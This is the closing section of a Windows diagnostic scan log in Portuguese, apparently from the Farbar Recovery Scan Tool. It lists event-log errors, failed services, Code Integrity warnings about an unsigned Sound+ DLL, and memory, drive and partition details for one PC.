Error: (01/16/2016 09:08:26 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy!App com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:13:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ElanTPCfg64.exe, versão: 1.0.65.1, carimbo de data/hora: 0x4f0be108
Nome do módulo com falha: ETDApi.dll, versão: 11.9.0.0, carimbo de data/hora: 0x5448e4ce
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000008f72
ID do processo com falha: 0xe64
Hora de início do aplicativo com falha: 0xElanTPCfg64.exe0
Caminho do aplicativo com falha: ElanTPCfg64.exe1
Caminho do módulo com falha: ElanTPCfg64.exe2
ID do Relatório: ElanTPCfg64.exe3
Nome completo do pacote com falha: ElanTPCfg64.exe4
ID do aplicativo relativo ao pacote com falha: ElanTPCfg64.exe5
Error: (01/16/2016 08:11:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:10:27 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:10:27 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Erros de Sistema:
=============
Error: (01/16/2016 09:25:15 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORIDADE NTSERVIÇO LOCALS-1-5-19LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (01/16/2016 09:09:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Replicate Exit devido ao seguinte erro:
%%3
Error: (01/16/2016 09:09:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Free Space Decimal Point devido ao seguinte erro:
%%3
Error: (01/16/2016 09:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: O serviço Listener Adapter Net.Tcp depende do serviço Serviço de Compartilhamento de Porta Net.Tcp, mas não foi possível iniciá-lo devido ao seguinte erro:
%%1058
Error: (01/16/2016 09:09:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço GoogleChromeUpService devido ao seguinte erro:
%%2
Error: (01/16/2016 09:08:26 PM) (Source: DCOM) (EventID: 10010) (User: Marcio-PC)
Description: Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider
Error: (01/16/2016 09:08:24 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Host de Sincronização_Session1 foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 10000 milissegundos: Reiniciar o serviço.
Error: (01/16/2016 08:33:28 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: O serviço Gerenciador de Autenticação Xbox Live terminou com o seguinte erro específico de serviço:
%%0
Error: (01/16/2016 08:15:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Host de Sincronização_Session1.
Error: (01/16/2016 08:14:48 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
CodeIntegrity:
===================================
Date: 2016-01-14 22:20:00.250
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:14.978
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:14.956
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.146
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.098
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-14 22:15:11.057
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-13 20:40:52.871
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-10 13:27:41.415
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-09 07:57:03.183
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-01-08 22:12:52.173
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i5 CPU M 460 @ 2.53GHz
Percentagem de memória em uso: 60%
RAM física total: 3885.61 MB
RAM física disponível: 1529.18 MB
Virtual Total: 7853.61 MB
Virtual disponível: 5156.32 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:464.49 GB) (Free:205.35 GB) NTFS
Drive e: (Reservado pelo Sistema) (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS ==>[sistema com componentes de inicialização (obtido através de drive)]
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C456F663)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=464.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=500 MB) - (Type=27)
Partition 4: (Not Active) - (Size=450 MB) - (Type=27)
==================== Fim de Addition.txt ============================